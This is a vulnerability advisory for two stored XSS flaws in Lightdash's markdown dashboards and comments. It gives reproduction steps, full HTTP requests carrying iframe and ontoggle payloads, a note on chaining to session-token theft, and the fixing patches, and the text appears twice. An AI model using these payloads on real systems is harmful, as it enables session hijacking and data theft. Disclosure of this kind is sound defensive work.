Summary
Multiple stored cross-site scripting (“XSS”) vulnerabilities in the markdown dashboard and dashboard comment functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to inject malicious scripts into vulnerable web pages. A threat actor could potentially exploit this vulnerability to store malicious JavaScript which executes in the context of a user’s session with the application.
Severity
HIGH - Exploitation of this vulnerability could allow a threat actor to impersonate a user through request forgery, session hijacking, or an account takeover. In addition, a threat actor could access or exfiltrate any data the victim user can access.
Proof of Concept
Multiple instances of stored XSS exist within the affected version:
Instance 1: Markdown Dashboard
Affected Endpoint (Storage): PATCH /api/v1/dashboards/<DashboardIdentifier>
Affected Endpoint (Execution): GET /projects/<ProjectIdentifier>/dashboards/<DashboardIdentifier>/view
Affected Parameters: content
Reproduction Steps:
- Log in as a user with the permissions to create a new dashboard and create a markdown dashboard
- Edit the dashboard and insert the payload
<iframe src=”javascript:alert(document.domain)”>. Save the dashboard
- Observe payload execution when the dashboard is loaded.
- Navigate away, return to the dashboard, and observe that the payload is still executed and was stored by the application.
An example request to store an XSS payload in the markdown dashboard is shown below. The XSS will be triggered when viewing the injected dashboard.
PATCH /api/v1/dashboards/<DashboardIdentifier> HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"tiles":[{"uuid":"<UniqueIdentifier>","x":0,"y":0,"h":9,"w":15,"type":"markdown","properties":{"title":"title","hideTitle":false,"content":"start\n<iframe src=\"javascript:alert(document.domain)\" style=\"position: absolute;width:0;height:0;border:0;\">frame</iframe>\nend\n"}}],"filters":{"dimensions":[],"metrics":[],"tableCalculations":[]},"name":"my dashboard"}
Instance 2: Dashboard Comments
Affected Endpoint (Storage): POST /api/v1/comments/dashboards/<DashboardIdentifier>/<UniqueIdentifier>
Affected Endpoint (Execution): GET /projects/<ProjectIdentifier>/<DashboardIdentifier>/view
Affected Parameters: textHtml
Reproduction Steps:
- Log into the application and navigate to a shared dashboard
- Use the dashboard comment functionality to add a new comment. Optional: use the comment
@ functionality to target a potential victim account
- Intercept the request with Burp Suite and insert the payload
<details/open/ontoggle=alert(document.domain)> into the value of textHtml
- Forward the request and observe that the payload executes when viewing the dashboard comments
An example HTTP request to store the XSS payload in a comment is shown below. After submitting the comment the XSS will be triggered when viewing dashboard comments.
POST /api/v1/comments/dashboards/<DashboardIdentifier>/<UniqueIdentifier> HTTP/2
Host: lightdash-host
...
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"text":"@<user>","textHtml":"<p><strong><span style=\"color: #228be6; font-weight: 500;\">@user</span></strong> test<details/open/ontoggle=alert(document.domain)></p>","mentions":["<MentionIdentifier>"]}
Further Analysis
A threat actor needs permissions to create dashboards and make dashboard comments, such as those granted with the Administrator or Editor roles. The threat actor must only identify the affected scope, submit the XSS payload, and wait for an unsuspecting user to visit the affected page. The application contains functionality to tag users and notify them of new comments, which increases the likelihood of a user browsing to a page and triggering payload execution.
This vulnerability can be used to force a user to export a dashboard, trigger CVE-2024-6586, and leak the user’s session token to a threat actor, resulting in session takeover.
Vendor Analysis
The vendor determined that the root cause of this issue was markdown + comment components execute scripts. The issue was remediated in version 0.1042.2.
Remediation Information
Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1042.2
Remediation patch 1
Description: sanitizes HTML for markdown tiles
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9510.patch
GitHub Pull Request: lightdash/lightdash#9510
Remediation patch 2
Description: sanitizes HTML for comments
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9359.patch
GitHub Pull Request: lightdash/lightdash#9359
Timeline
Date reported: 03/07/2024
Date fixed: 03/26/2024
Date disclosed: 08/30/2024
kennethchiong Finder
Summary
Multiple stored cross-site scripting (“XSS”) vulnerabilities in the markdown dashboard and dashboard comment functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to inject malicious scripts into vulnerable web pages. A threat actor could potentially exploit this vulnerability to store malicious JavaScript which executes in the context of a user’s session with the application.
Severity
HIGH - Exploitation of this vulnerability could allow a threat actor to impersonate a user through request forgery, session hijacking, or an account takeover. In addition, a threat actor could access or exfiltrate any data the victim user can access.
Proof of Concept
Multiple instances of stored XSS exist within the affected version:
Instance 1: Markdown Dashboard
Affected Endpoint (Storage):
PATCH /api/v1/dashboards/<DashboardIdentifier>Affected Endpoint (Execution):
GET /projects/<ProjectIdentifier>/dashboards/<DashboardIdentifier>/viewAffected Parameters:
contentReproduction Steps:
<iframe src=”javascript:alert(document.domain)”>. Save the dashboardAn example request to store an XSS payload in the markdown dashboard is shown below. The XSS will be triggered when viewing the injected dashboard.
Instance 2: Dashboard Comments
Affected Endpoint (Storage):
POST /api/v1/comments/dashboards/<DashboardIdentifier>/<UniqueIdentifier>Affected Endpoint (Execution):
GET /projects/<ProjectIdentifier>/<DashboardIdentifier>/viewAffected Parameters:
textHtmlReproduction Steps:
@functionality to target a potential victim account<details/open/ontoggle=alert(document.domain)>into the value oftextHtmlAn example HTTP request to store the XSS payload in a comment is shown below. After submitting the comment the XSS will be triggered when viewing dashboard comments.
Further Analysis
A threat actor needs permissions to create dashboards and make dashboard comments, such as those granted with the Administrator or Editor roles. The threat actor must only identify the affected scope, submit the XSS payload, and wait for an unsuspecting user to visit the affected page. The application contains functionality to tag users and notify them of new comments, which increases the likelihood of a user browsing to a page and triggering payload execution.
This vulnerability can be used to force a user to export a dashboard, trigger CVE-2024-6586, and leak the user’s session token to a threat actor, resulting in session takeover.
Vendor Analysis
The vendor determined that the root cause of this issue was markdown + comment components execute scripts. The issue was remediated in version 0.1042.2.
Remediation Information
Remediated Version: https://github.com/lightdash/lightdash/releases/tag/0.1042.2
Remediation patch 1
Description: sanitizes HTML for markdown tiles
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9510.patch
GitHub Pull Request: lightdash/lightdash#9510
Remediation patch 2
Description: sanitizes HTML for comments
Git Patch: https://patch-diff.githubusercontent.com/raw/lightdash/lightdash/pull/9359.patch
GitHub Pull Request: lightdash/lightdash#9359
Timeline
Date reported: 03/07/2024
Date fixed: 03/26/2024
Date disclosed: 08/30/2024